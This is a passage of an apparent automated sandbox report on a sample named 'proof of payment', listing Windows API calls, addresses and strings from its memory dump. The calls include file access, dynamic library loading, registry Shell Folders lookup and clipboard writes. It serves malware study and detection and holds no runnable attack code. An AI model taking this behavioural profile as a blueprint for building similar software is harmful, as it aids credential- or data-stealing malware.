                                      • SetFilePointer.KERNELBASE(?,?,?,00000000), ref: 00417591
                                      • GetLastError.KERNEL32 ref: 004175A2
                                      • GetLastError.KERNEL32 ref: 004175A8
                                      Similarity
                                      • API ID: ErrorLast$FilePointer
                                      • String ID:
                                      • API String ID: 1156039329-0
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      APIs
                                      • CreateFileW.KERNELBASE(00000000,80000000,00000003,00000000,00000003,02000000,00000000,00000000,00000000,004039CA,00000000,?,00000000,?,00000000), ref: 0040A044
                                      • GetFileTime.KERNEL32(00000000,00000000,00000000,?), ref: 0040A058
                                      • FindCloseChangeNotification.KERNELBASE(00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,004455D5), ref: 0040A061
                                      Similarity
                                      • API ID: File$ChangeCloseCreateFindNotificationTime
                                      • String ID:
                                      • API String ID: 1631957507-0
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      APIs
                                      • GetTempPathW.KERNEL32(00000104,?,00445FAE), ref: 00409A5C
                                      • GetWindowsDirectoryW.KERNEL32(?,00000104), ref: 00409A6E
                                      • GetTempFileNameW.KERNELBASE(?,0040B827,00000000,?), ref: 00409A85
                                      Similarity
                                      • API ID: Temp$DirectoryFileNamePathWindows
                                      • String ID:
                                      • API String ID: 1125800050-0
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      Strings
                                      • failed memory resize %u to %u bytes, xrefs: 00415358
                                      Similarity
                                      • API ID: realloc
                                      • String ID: failed memory resize %u to %u bytes
                                      • API String ID: 471065373-2134078882
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      Similarity
                                      • API ID:
                                      • String ID: d
                                      • API String ID: 0-2564639436
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      Similarity
                                      • API ID: memset
                                      • String ID: BINARY
                                      • API String ID: 2221118986-907554435
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      APIs
                                        • Part of subcall function 0040ECD8: ??2@YAPAXI@Z.MSVCRT ref: 0040ECF9
                                        • Part of subcall function 0040ECD8: ??3@YAXPAX@Z.MSVCRT ref: 0040EDC0
                                      • GetStdHandle.KERNEL32(000000F5), ref: 00410530
                                      • FindCloseChangeNotification.KERNELBASE(?), ref: 00410654
                                        • Part of subcall function 004096DC: CreateFileW.KERNELBASE(00000001,40000000,00000001,00000000,00000002,00000000,00000000,0040E0F1,00000104), ref: 004096EE
                                        • Part of subcall function 0040973C: GetLastError.KERNEL32 ref: 00409750
                                        • Part of subcall function 0040973C: _snwprintf.MSVCRT ref: 0040977D
                                        • Part of subcall function 0040973C: MessageBoxW.USER32(?,?,Error,00000030), ref: 00409796
                                      Similarity
                                      • API ID: ??2@??3@ChangeCloseCreateErrorFileFindHandleLastMessageNotification_snwprintf
                                      • String ID:
                                      • API String ID: 1161345128-0
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      Similarity
                                      • API ID: _wcsicmp
                                      • String ID: /stext
                                      • API String ID: 2081463915-3817206916
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      APIs
                                        • Part of subcall function 004096C3: CreateFileW.KERNELBASE(00000000,80000000,00000003,00000000,00000003,00000000,00000000,0044509F,00000000,?,00000000,00000104,00445E7E,?,?), ref: 004096D5
                                      • GetFileSize.KERNEL32(00000000,00000000,000003FF,?,00000000,0040B7D4,?,?,?,?,000003FF,?,?,?,00445FAE,?), ref: 0040CC44
                                        • Part of subcall function 0040AFCF: ??2@YAPAXI@Z.MSVCRT ref: 0040AFD8
                                        • Part of subcall function 0040A2EF: ReadFile.KERNELBASE(00000000,00000000,004450DD,00000000,00000000,?,?,004450DD,00000000,00000000), ref: 0040A306
                                        • Part of subcall function 0040AB4A: MultiByteToWideChar.KERNEL32(00000000,00000000,?,?,00000000,00000000,?,00000001,?,00401D51,00000000,00000001,00000000), ref: 0040AB63
                                        • Part of subcall function 0040AB4A: MultiByteToWideChar.KERNEL32(00000000,00000000,?,?,00000000,00000000,?,00000001,?,00401D51,00000000,00000001,00000000), ref: 0040AB88
                                      • FindCloseChangeNotification.KERNELBASE(?,?,000000FF,0000FDE9), ref: 0040CC98
                                        • Part of subcall function 0040B04B: ??3@YAXPAX@Z.MSVCRT ref: 0040B052
                                      Similarity
                                      • API ID: File$ByteCharMultiWide$??2@??3@ChangeCloseCreateFindNotificationReadSize
                                      • String ID:
                                      • API String ID: 159017214-0

                                      APIs
                                        • Part of subcall function 0040A804: memset.MSVCRT ref: 0040A824
                                        • Part of subcall function 0040A804: GetSystemDirectoryW.KERNEL32(0045DE68,00000104), ref: 0040A841
                                        • Part of subcall function 0040A804: wcscpy.MSVCRT ref: 0040A854
                                        • Part of subcall function 0040A804: wcscat.MSVCRT ref: 0040A86A
                                        • Part of subcall function 0040A804: LoadLibraryW.KERNELBASE(00000000,?,?,?,?,?,?,?), ref: 0040A87B
                                        • Part of subcall function 0040A804: LoadLibraryW.KERNEL32(?,?,?,?,?,?,?,?), ref: 0040A884
                                      • GetProcAddress.KERNEL32(?,00000000), ref: 00404453
                                      • FreeLibrary.KERNEL32(00000000,00000141,?,00000000,?,004026E9,?,?,00000000,?), ref: 00404476
                                      Memory Dump Source
                                      • Source File: 0000000F.00000002.1695473243.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_15_2_400000_proof of payment.jbxd
                                      Similarity
                                      • API ID: Library$Load$AddressDirectoryFreeProcSystemmemsetwcscatwcscpy
                                      • String ID:
                                      • API String ID: 3150196962-0

                                      Strings
                                      • failed to allocate %u bytes of memory, xrefs: 004152F0
                                      Memory Dump Source
                                      • Source File: 0000000F.00000002.1695473243.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_15_2_400000_proof of payment.jbxd
                                      Similarity
                                      • API ID: malloc
                                      • String ID: failed to allocate %u bytes of memory
                                      • API String ID: 2803490479-1168259600

                                      Memory Dump Source
                                      • Source File: 0000000F.00000002.1695473243.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_15_2_400000_proof of payment.jbxd
                                      Similarity
                                      • API ID: ??3@
                                      • String ID:
                                      • API String ID: 613200358-0

                                      Memory Dump Source
                                      • Source File: 0000000F.00000002.1695473243.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_15_2_400000_proof of payment.jbxd
                                      Similarity
                                      • API ID: memcmpmemset
                                      • String ID:
                                      • API String ID: 1065087418-0

                                      Memory Dump Source
                                      • Source File: 0000000F.00000002.1695473243.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_15_2_400000_proof of payment.jbxd
                                      Similarity
                                      • API ID: memset
                                      • String ID:
                                      • API String ID: 2221118986-0

                                      APIs
                                        • Part of subcall function 00403A16: memset.MSVCRT ref: 00403A55
                                        • Part of subcall function 0040A02C: CreateFileW.KERNELBASE(00000000,80000000,00000003,00000000,00000003,02000000,00000000,00000000,00000000,004039CA,00000000,?,00000000,?,00000000), ref: 0040A044
                                        • Part of subcall function 0040A02C: GetFileTime.KERNEL32(00000000,00000000,00000000,?), ref: 0040A058
                                        • Part of subcall function 0040A02C: FindCloseChangeNotification.KERNELBASE(00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,004455D5), ref: 0040A061
                                      • CompareFileTime.KERNEL32(?,?,00000000,?,00000000), ref: 004039D4
                                      Memory Dump Source
                                      • Source File: 0000000F.00000002.1695473243.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_15_2_400000_proof of payment.jbxd
                                      Similarity
                                      • API ID: File$Time$ChangeCloseCompareCreateFindNotificationmemset
                                      • String ID:
                                      • API String ID: 1481295809-0

                                      APIs
                                        • Part of subcall function 004135E0: FreeLibrary.KERNELBASE(?,00413603,00000000,0044557A,?,?,?,?,?,00403335,?), ref: 004135EC
                                        • Part of subcall function 0040A804: memset.MSVCRT ref: 0040A824
                                        • Part of subcall function 0040A804: GetSystemDirectoryW.KERNEL32(0045DE68,00000104), ref: 0040A841
                                        • Part of subcall function 0040A804: wcscpy.MSVCRT ref: 0040A854
                                        • Part of subcall function 0040A804: wcscat.MSVCRT ref: 0040A86A
                                        • Part of subcall function 0040A804: LoadLibraryW.KERNELBASE(00000000,?,?,?,?,?,?,?), ref: 0040A87B
                                        • Part of subcall function 0040A804: LoadLibraryW.KERNEL32(?,?,?,?,?,?,?,?), ref: 0040A884
                                      • GetProcAddress.KERNEL32(?,00000000), ref: 0041362A
                                      Memory Dump Source
                                      • Source File: 0000000F.00000002.1695473243.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_15_2_400000_proof of payment.jbxd
                                      Similarity
                                      • API ID: Library$Load$AddressDirectoryFreeProcSystemmemsetwcscatwcscpy
                                      • String ID:
                                      • API String ID: 3150196962-0

                                      APIs
                                      • SetFilePointerEx.KERNELBASE(0040627C,?,?,00000000,00000000,00000000,004068F9,00000000,00000000,?,00000000,0040627C), ref: 004062C2
                                        • Part of subcall function 0040A2EF: ReadFile.KERNELBASE(00000000,00000000,004450DD,00000000,00000000,?,?,004450DD,00000000,00000000), ref: 0040A306
                                      Memory Dump Source
                                      • Source File: 0000000F.00000002.1695473243.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_15_2_400000_proof of payment.jbxd
                                      Similarity
                                      • API ID: File$PointerRead
                                      • String ID:
                                      • API String ID: 3154509469-0

                                      APIs
                                      • GetPrivateProfileIntW.KERNEL32(?,?,?,?), ref: 00414588
                                        • Part of subcall function 004143F1: memset.MSVCRT ref: 00414410
                                        • Part of subcall function 004143F1: _itow.MSVCRT ref: 00414427
                                        • Part of subcall function 004143F1: WritePrivateProfileStringW.KERNEL32(?,?,00000000), ref: 00414436
                                      Memory Dump Source
                                      • Source File: 0000000F.00000002.1695473243.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_15_2_400000_proof of payment.jbxd
                                      Similarity
                                      • API ID: PrivateProfile$StringWrite_itowmemset
                                      • String ID:
                                      • API String ID: 4232544981-0

                                      APIs
                                      • FreeLibrary.KERNELBASE(?,?,004452FB,?,?,?,0040333C,?), ref: 00444A65
                                      Memory Dump Source
                                      • Source File: 0000000F.00000002.1695473243.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_15_2_400000_proof of payment.jbxd
                                      Similarity
                                      • API ID: FreeLibrary
                                      • String ID:
                                      • API String ID: 3664257935-0

                                      APIs
                                        • Part of subcall function 00413F4F: GetProcAddress.KERNEL32(00000000,psapi.dll), ref: 00413F6F
                                        • Part of subcall function 00413F4F: GetProcAddress.KERNEL32(?,EnumProcessModules), ref: 00413F7B
                                        • Part of subcall function 00413F4F: GetProcAddress.KERNEL32(?,GetModuleFileNameExW), ref: 00413F87
                                        • Part of subcall function 00413F4F: GetProcAddress.KERNEL32(?,EnumProcesses), ref: 00413F93
                                        • Part of subcall function 00413F4F: GetProcAddress.KERNEL32(?,GetModuleInformation), ref: 00413F9F
                                      • K32GetModuleFileNameExW.KERNEL32(00000104,00000000,00413E1F,00000104,00413E1F,00000000,?), ref: 00413F46
                                      Memory Dump Source
                                      • Source File: 0000000F.00000002.1695473243.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_15_2_400000_proof of payment.jbxd
                                      Similarity
                                      • API ID: AddressProc$FileModuleName
                                      • String ID:
                                      • API String ID: 3859505661-0

                                      APIs
                                      • ReadFile.KERNELBASE(00000000,00000000,004450DD,00000000,00000000,?,?,004450DD,00000000,00000000), ref: 0040A306
                                      Memory Dump Source
                                      • Source File: 0000000F.00000002.1695473243.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_15_2_400000_proof of payment.jbxd
                                      Similarity
                                      • API ID: FileRead
                                      • String ID:
                                      • API String ID: 2738559852-0

                                      APIs
                                      • WriteFile.KERNELBASE(?,00000009,?,00000000,00000000,?,?,00402F9B,?,00000000,00000000,00000000,0000017E), ref: 0040A325
                                      Memory Dump Source
                                      • Source File: 0000000F.00000002.1695473243.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_15_2_400000_proof of payment.jbxd
                                      Similarity
                                      • API ID: FileWrite
                                      • String ID:
                                      • API String ID: 3934441357-0

                                      APIs
                                      • FreeLibrary.KERNELBASE(00000000,004457F2,00000000,000001F7,00000000), ref: 00413D30
                                      Memory Dump Source
                                      • Source File: 0000000F.00000002.1695473243.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_15_2_400000_proof of payment.jbxd
                                      Similarity
                                      • API ID: FreeLibrary
                                      • String ID:
                                      • API String ID: 3664257935-0

                                      APIs
                                      Memory Dump Source
                                      • Source File: 0000000F.00000002.1695473243.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_15_2_400000_proof of payment.jbxd
                                      Similarity
                                      • API ID: ??3@
                                      • String ID:
                                      • API String ID: 613200358-0

                                      APIs
                                      • CreateFileW.KERNELBASE(00000000,80000000,00000003,00000000,00000003,00000000,00000000,0044509F,00000000,?,00000000,00000104,00445E7E,?,?), ref: 004096D5
                                      Memory Dump Source
                                      • Source File: 0000000F.00000002.1695473243.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_15_2_400000_proof of payment.jbxd
                                      Similarity
                                      • API ID: CreateFile
                                      • String ID:
                                      • API String ID: 823142352-0

                                      APIs
                                      • CreateFileW.KERNELBASE(00000001,40000000,00000001,00000000,00000002,00000000,00000000,0040E0F1,00000104), ref: 004096EE
                                      Memory Dump Source
                                      • Source File: 0000000F.00000002.1695473243.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_15_2_400000_proof of payment.jbxd
                                      Similarity
                                      • API ID: CreateFile
                                      • String ID:
                                      • API String ID: 823142352-0

                                      APIs
                                      Memory Dump Source
                                      • Source File: 0000000F.00000002.1695473243.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_15_2_400000_proof of payment.jbxd
                                      Similarity
                                      • API ID: ??3@
                                      • String ID:
                                      • API String ID: 613200358-0

                                      APIs
                                      Memory Dump Source
                                      • Source File: 0000000F.00000002.1695473243.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_15_2_400000_proof of payment.jbxd
                                      Similarity
                                      • API ID: ??3@
                                      • String ID:
                                      • API String ID: 613200358-0

                                      APIs
                                      • FreeLibrary.KERNELBASE(?,00413603,00000000,0044557A,?,?,?,?,?,00403335,?), ref: 004135EC
                                      Memory Dump Source
                                      • Source File: 0000000F.00000002.1695473243.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_15_2_400000_proof of payment.jbxd
                                      Similarity
                                      • API ID: FreeLibrary
                                      • String ID:
                                      • API String ID: 3664257935-0

                                      APIs
                                      • EnumResourceNamesW.KERNELBASE(?,?,Function_000148B6,00000000), ref: 0041494B
                                      Memory Dump Source
                                      • Source File: 0000000F.00000002.1695473243.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_15_2_400000_proof of payment.jbxd
                                      Similarity
                                      • API ID: EnumNamesResource
                                      • String ID:
                                      • API String ID: 3334572018-0
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      APIs
                                      • FreeLibrary.KERNELBASE(?), ref: 0044DEB6
                                      Memory Dump Source
                                      • Source File: 0000000F.00000002.1695473243.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_15_2_400000_proof of payment.jbxd
                                      Similarity
                                      • API ID: FreeLibrary
                                      • String ID:
                                      • API String ID: 3664257935-0
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      APIs
                                      • FindClose.KERNELBASE(?,0040AE21,?,00000000,00445EF5,*.*,?,00000000,?,00000104,?,?,?,?,?,00000104), ref: 0040AEC8
                                      Memory Dump Source
                                      • Source File: 0000000F.00000002.1695473243.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_15_2_400000_proof of payment.jbxd
                                      Similarity
                                      • API ID: CloseFind
                                      • String ID:
                                      • API String ID: 1863332320-0
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      APIs
                                      • RegOpenKeyExW.KERNELBASE(80000002,80000002,00000000,00020019,80000002,00414CC1,80000002,Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders,00445DDE,?,?,00000000), ref: 004145A5
                                      Memory Dump Source
                                      • Source File: 0000000F.00000002.1695473243.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_15_2_400000_proof of payment.jbxd
                                      Similarity
                                      • API ID: Open
                                      • String ID:
                                      • API String ID: 71445658-0
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      APIs
                                      • GetFileAttributesW.KERNELBASE(?,00445E12,?,?,?,00000104), ref: 00409B9C
                                      Memory Dump Source
                                      • Source File: 0000000F.00000002.1695473243.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_15_2_400000_proof of payment.jbxd
                                      Similarity
                                      • API ID: AttributesFile
                                      • String ID:
                                      • API String ID: 3188754299-0
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      Memory Dump Source
                                      • Source File: 0000000F.00000002.1695473243.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_15_2_400000_proof of payment.jbxd
                                      Similarity
                                      • API ID: ??3@
                                      • String ID:
                                      • API String ID: 613200358-0
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      Memory Dump Source
                                      • Source File: 0000000F.00000002.1695473243.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_15_2_400000_proof of payment.jbxd
                                      Similarity
                                      • API ID:
                                      • String ID:
                                      • API String ID:
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      APIs
                                      • memset.MSVCRT ref: 004095FC
                                        • Part of subcall function 00409D1F: wcslen.MSVCRT ref: 00409D29
                                        • Part of subcall function 00409D1F: wcslen.MSVCRT ref: 00409D33
                                        • Part of subcall function 00409D1F: wcscpy.MSVCRT ref: 00409D47
                                        • Part of subcall function 00409D1F: wcscat.MSVCRT ref: 00409D55
                                        • Part of subcall function 00409B98: GetFileAttributesW.KERNELBASE(?,00445E12,?,?,?,00000104), ref: 00409B9C
                                        • Part of subcall function 004091B8: memset.MSVCRT ref: 004091E2
                                        • Part of subcall function 004091B8: memcpy.MSVCRT ref: 004092C9
                                        • Part of subcall function 004091B8: memcmp.MSVCRT ref: 004092D9
                                      Memory Dump Source
                                      • Source File: 0000000F.00000002.1695473243.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_15_2_400000_proof of payment.jbxd
                                      Similarity
                                      • API ID: memsetwcslen$AttributesFilememcmpmemcpywcscatwcscpy
                                      • String ID:
                                      • API String ID: 3655998216-0
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      Memory Dump Source
                                      • Source File: 0000000F.00000002.1695473243.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_15_2_400000_proof of payment.jbxd
                                      Similarity
                                      • API ID:
                                      • String ID:
                                      • API String ID:
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      APIs
                                      • memset.MSVCRT ref: 00445426
                                        • Part of subcall function 00409D1F: wcslen.MSVCRT ref: 00409D29
                                        • Part of subcall function 00409D1F: wcslen.MSVCRT ref: 00409D33
                                        • Part of subcall function 00409D1F: wcscpy.MSVCRT ref: 00409D47
                                        • Part of subcall function 00409D1F: wcscat.MSVCRT ref: 00409D55
                                        • Part of subcall function 00409B98: GetFileAttributesW.KERNELBASE(?,00445E12,?,?,?,00000104), ref: 00409B9C
                                        • Part of subcall function 0040B6EF: memset.MSVCRT ref: 0040B71C
                                        • Part of subcall function 0040B6EF: wcsrchr.MSVCRT ref: 0040B738
                                        • Part of subcall function 0040B6EF: memset.MSVCRT ref: 0040B756
                                        • Part of subcall function 0040B6EF: memset.MSVCRT ref: 0040B7F5
                                        • Part of subcall function 0040B6EF: CreateFileW.KERNELBASE(00445FAE,80000000,00000000,00000000,00000003,00000000,00000000,?,?), ref: 0040B80C
                                      Memory Dump Source
                                      • Source File: 0000000F.00000002.1695473243.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_15_2_400000_proof of payment.jbxd
                                      Similarity
                                      • API ID: memset$Filewcslen$AttributesCreatewcscatwcscpywcsrchr
                                      • String ID:
                                      • API String ID: 1828521557-0
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      Memory Dump Source
                                      • Source File: 0000000F.00000002.1695473243.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_15_2_400000_proof of payment.jbxd
                                      Similarity
                                      • API ID: _wcsicmp
                                      • String ID:
                                      • API String ID: 2081463915-0
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      APIs
                                        • Part of subcall function 00406294: CloseHandle.KERNEL32(000000FF,00406224,00000000,00000000,0040E03C,?,00000000,00000104,00000000,?,?,?,0040E521,?,0040E6A3,000000FF), ref: 0040629C
                                        • Part of subcall function 004096C3: CreateFileW.KERNELBASE(00000000,80000000,00000003,00000000,00000003,00000000,00000000,0044509F,00000000,?,00000000,00000104,00445E7E,?,?), ref: 004096D5
                                      • GetLastError.KERNEL32(00000000,00000000,0040E03C,?,00000000,00000104,00000000,?,?,?,0040E521,?,0040E6A3,000000FF,?,00000104), ref: 00406281
                                        • Part of subcall function 0040A2EF: ReadFile.KERNELBASE(00000000,00000000,004450DD,00000000,00000000,?,?,004450DD,00000000,00000000), ref: 0040A306
                                      Memory Dump Source
                                      • Source File: 0000000F.00000002.1695473243.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_15_2_400000_proof of payment.jbxd
                                      Similarity
                                      • API ID: File$CloseCreateErrorHandleLastRead
                                      • String ID:
                                      • API String ID: 2136311172-0
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      APIs
                                        • Part of subcall function 0040B04B: ??3@YAXPAX@Z.MSVCRT ref: 0040B052
                                      • ??2@YAPAXI@Z.MSVCRT ref: 0040AFD8
                                      Memory Dump Source
                                      • Source File: 0000000F.00000002.1695473243.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_15_2_400000_proof of payment.jbxd
                                      Similarity
                                      • API ID: ??2@??3@
                                      • String ID:
                                      • API String ID: 1936579350-0
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      APIs
                                      • EmptyClipboard.USER32 ref: 004098EC
                                        • Part of subcall function 004096C3: CreateFileW.KERNELBASE(00000000,80000000,00000003,00000000,00000003,00000000,00000000,0044509F,00000000,?,00000000,00000104,00445E7E,?,?), ref: 004096D5
                                      • GetFileSize.KERNEL32(00000000,00000000), ref: 00409909
                                      • GlobalAlloc.KERNEL32(00002000,00000002), ref: 0040991A
                                      • GlobalFix.KERNEL32(00000000), ref: 00409927
                                      • ReadFile.KERNEL32(?,00000000,00000000,?,00000000), ref: 0040993A
                                      • GlobalUnWire.KERNEL32(00000000), ref: 0040994C
                                      • SetClipboardData.USER32(0000000D,00000000), ref: 00409955
                                      • GetLastError.KERNEL32 ref: 0040995D
                                      • CloseHandle.KERNEL32(?), ref: 00409969
                                      • GetLastError.KERNEL32 ref: 00409974
                                      • CloseClipboard.USER32 ref: 0040997D
                                      Memory Dump Source
                                      • Source File: 0000000F.00000002.1695473243.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_15_2_400000_proof of payment.jbxd
                                      Similarity
                                      • API ID: ClipboardFileGlobal$CloseErrorLast$AllocCreateDataEmptyHandleReadSizeWire
                                      • String ID:
                                      • API String ID: 2565263379-0
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      APIs
                                      • EmptyClipboard.USER32 ref: 00409882
                                      • wcslen.MSVCRT ref: 0040988F
                                      • GlobalAlloc.KERNEL32(00002000,00000002,?,?,?,?,00411A1E,-00000210), ref: 0040989F
                                      • GlobalFix.KERNEL32(00000000), ref: 004098AC
                                      • memcpy.MSVCRT ref: 004098B5
                                      • GlobalUnWire.KERNEL32(00000000), ref: 004098BE
                                      • SetClipboardData.USER32(0000000D,00000000), ref: 004098C7
                                      • CloseClipboard.USER32 ref: 004098D7
                                      Memory Dump Source
                                      • Source File: 0000000F.00000002.1695473243.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_15_2_400000_proof of payment.jbxd
                                      Similarity
                                      • API ID: ClipboardGlobal$AllocCloseDataEmptyWirememcpywcslen
                                      • String ID:
                                      • API String ID: 2014503067-0
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      APIs
                                      • GetLastError.KERNEL32 ref: 004182D7
                                        • Part of subcall function 0041739B: GetVersionExW.KERNEL32(?), ref: 004173BE
                                      • FormatMessageW.KERNEL32(00001300,00000000,00000000,00000000,?,00000000,00000000), ref: 004182FE
                                      • FormatMessageA.KERNEL32(00001300,00000000,00000000,00000000,?,00000000,00000000), ref: 00418327
                                      • LocalFree.KERNEL32(?), ref: 00418342
                                      • ??3@YAXPAX@Z.MSVCRT ref: 00418370
                                        • Part of subcall function 00417434: WideCharToMultiByte.KERNEL32(0000FDE9,00000000,?,000000FF,00000000,00000000,00000000,00000000,00000000,?,?,76F8DF80,?,0041755F,?), ref: 00417452
                                        • Part of subcall function 00417434: malloc.MSVCRT ref: 00417459
                                      Memory Dump Source
                                      • Source File: 0000000F.00000002.1695473243.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_15_2_400000_proof of payment.jbxd
                                      Similarity
                                      • API ID: FormatMessage$??3@ByteCharErrorFreeLastLocalMultiVersionWidemalloc
                                      • String ID: OsError 0x%x (%u)
                                      • API String ID: 403622227-2664311388
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      Memory Dump Source
                                      • Source File: 0000000F.00000002.1695473243.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_15_2_400000_proof of payment.jbxd
                                      Similarity
                                      • API ID: ??2@??3@memcpymemset
                                      • String ID:
                                      • API String ID: 1865533344-0
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      APIs
                                      • GetVersionExW.KERNEL32(?), ref: 004173BE
                                      Memory Dump Source
                                      • Source File: 0000000F.00000002.1695473243.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_15_2_400000_proof of payment.jbxd
                                      Similarity
                                      • API ID: Version
                                      • String ID:
                                      • API String ID: 1889659487-0
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      APIs
